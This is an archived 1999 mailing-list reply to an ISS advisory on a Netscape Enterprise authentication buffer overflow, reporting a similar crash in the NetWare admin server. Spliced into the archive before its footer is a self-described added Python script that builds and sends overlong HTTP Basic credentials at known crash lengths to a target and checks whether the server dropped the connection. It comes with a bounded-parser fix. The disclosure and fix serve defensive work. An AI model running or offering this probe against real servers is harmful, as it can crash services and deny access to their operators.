Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise

From: Brian Eckman (ECKMA009at_private)
Date: Wed Dec 08 1999 - 11:59:16 PST

    >Buffer Overflow in Netscape Enterprise and FastTrack Authentication
    >Procedure
    
    <<<snip>>>
    
    >Affected Versions:
    
    >This vulnerability affects all supported platforms of Enterprise and
    >FastTrack web servers. Enterprise 3.5.1 through 3.6sp2 and FastTrack 3.01
    >were found to be vulnerable. Earlier versions may be vulnerable but were not
    >tested by ISS X-Force.
    
    >Description:
    
    >The buffer overflow is present in the HTTP Basic Authentication portion of
    >the server. When accessing a password protected portion of the
    >Administration or Web server, a username or password that is longer than
    >508 characters will cause the server to crash with an access violation
    >error. An attacker could utilize the Base64 encoded Authorization string
    >to execute arbitrary code as SYSTEM on Windows NT, or as root on Unix.
    >Attackers can use these privileges to gain full access to the server.
    
    <<<snip>>>
    
    A similar problem exists in the Enterprise Web Server for NetWare 4.x and 5.x. When a username >310 chars is sent to the Admin Server, the Admin server crashes. Authentication to other password protected areas of the Web Server is not affected.
    
    SPECIFICS:
    With the Enterprise Server for NetWare, the admin port on the server will allow a username of any length when authenticating. A username of more than 310 characters will cause the admserv.nlm to crash. The admin port then is not accessible again until the server is rebooted. An attempt to manually unload the nlm caused the server to lock up completely. An attempt to reload the nlm resulted in a message stating that the nlm was already loaded.
    
    The offending process (admserv.nlm) does not appear to stop other services running on the server. The Web server continues to function normally, as does the LDAP authentication to other restricted areas. (I only tested restricted subdirectories within the web root)
    
    Regular directories within the Web site that require authentication are not vulnerable. Submitting a long username and/or password (somewhere over 1000 chars, I believe) will result in a message "Your browser sent a message this server could not understand." 
    
    I tested on a 4.11 box with SP7.
    
    Not sure if privileges can be gained...
    
    FIX:
    The Admin server can be turned off when not in use, or block that port with your firewall.
    
    I contacted an engineer at a local Novell office on Dec 2 with no response. Don't see a way on their site to report bugs :(
    
    Brian
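The reproduction described in the thread is a single HTTP request whose Basic Authorization header carries an overlong username. The following is an added example, not code from the original post, from ISS, or from Novell: it builds such a request for any username length (the thresholds quoted above are 310 for the NetWare admin server, 508 for Enterprise/FastTrack, and roughly 1000 for the regular protected directories), optionally sends it and reports whether the server answered or simply dropped the connection, and shows the server-side check that would have prevented the crash: bounding the credential length before the Base64 token is decoded into any fixed buffer. The host, port, path and the 256-byte limit are assumptions for illustration, and the `send_probe` helper should only be pointed at servers you are authorized to test.

```python
import base64
import binascii
import socket
from typing import Optional, Tuple

# Lengths quoted in the thread (constructed reference values, not test results):
#   >310 chars crashes admserv.nlm on Enterprise Server for NetWare (this post)
#   >508 chars crashes Enterprise 3.5.1-3.6sp2 / FastTrack 3.01 (ISS advisory)
PROBE_LENGTHS = (310, 311, 508, 509, 1000)

# Hypothetical server-side limit used by the bounded parser below.
MAX_CREDENTIAL_LEN = 256


def basic_auth_value(username: str, password: str) -> str:
    """Return the Authorization header value for HTTP Basic: 'Basic ' + b64(user:pass)."""
    if ":" in username:
        raise ValueError("username must not contain ':'")
    raw = f"{username}:{password}".encode("latin-1")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def build_probe_request(host: str, path: str, username_len: int, password: str = "x") -> bytes:
    """Build one HTTP/1.0 GET whose Basic credential has a username of exactly username_len bytes."""
    username = "A" * username_len
    lines = [
        f"GET {path} HTTP/1.0",
        f"Host: {host}",
        f"Authorization: {basic_auth_value(username, password)}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_basic_credentials(header_value: str, max_len: int = MAX_CREDENTIAL_LEN) -> Tuple[str, str]:
    """Bounded parser: reject oversized or malformed credentials before they reach any fixed buffer.

    Raises ValueError on anything that is not a well-formed Basic credential within max_len.
    """
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic" or not token:
        raise ValueError("not a Basic credential")
    # Base64 encodes 3 bytes as 4 characters, so the longest acceptable decoded
    # payload (max_len user + ':' + max_len password) bounds the token length.
    # Checking this first means an attacker-controlled length never drives the decode.
    max_token = ((2 * max_len + 1 + 2) // 3) * 4
    if len(token) > max_token:
        raise ValueError("credential too long")
    try:
        decoded = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        raise ValueError("malformed base64")
    user, sep, pwd = decoded.partition(b":")
    if not sep:
        raise ValueError("missing ':' separator")
    if len(user) > max_len or len(pwd) > max_len:
        raise ValueError("credential too long")
    return user.decode("latin-1"), pwd.decode("latin-1")


def send_probe(host: str, port: int, path: str, username_len: int, timeout: float = 5.0) -> Optional[bytes]:
    """Send one probe and return the raw response, or None if the server dropped the
    connection without answering (the crash symptom described in the thread).
    Network access is required; only use against servers you are authorized to test."""
    request = build_probe_request(host, path, username_len)
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except (socket.timeout, ConnectionResetError):
            pass
    return b"".join(chunks) or None


if __name__ == "__main__":
    # Assumed target for illustration; the admin server listens on its own port.
    TARGET_HOST, TARGET_PORT, TARGET_PATH = "admin.example.test", 8888, "/"
    for n in PROBE_LENGTHS:
        reply = send_probe(TARGET_HOST, TARGET_PORT, TARGET_PATH, n)
        status = reply.split(b"\r\n", 1)[0].decode("latin-1", "replace") if reply else "no reply (connection dropped)"
        print(f"username_len={n:5d}: {status}")
```

Run the probe lengths in ascending order and stop at the first one that gets no reply: on the NetWare admin server the thread reports that the port stays dead until a reboot, so a single over-threshold request ends the test session. The `parse_basic_credentials` function is the shape of the fix a server needs regardless of which threshold applies: the token length is bounded before decoding, so neither the decode nor the later copy into a fixed-size buffer is ever driven by an attacker-chosen length.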
    
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:19:22 PDT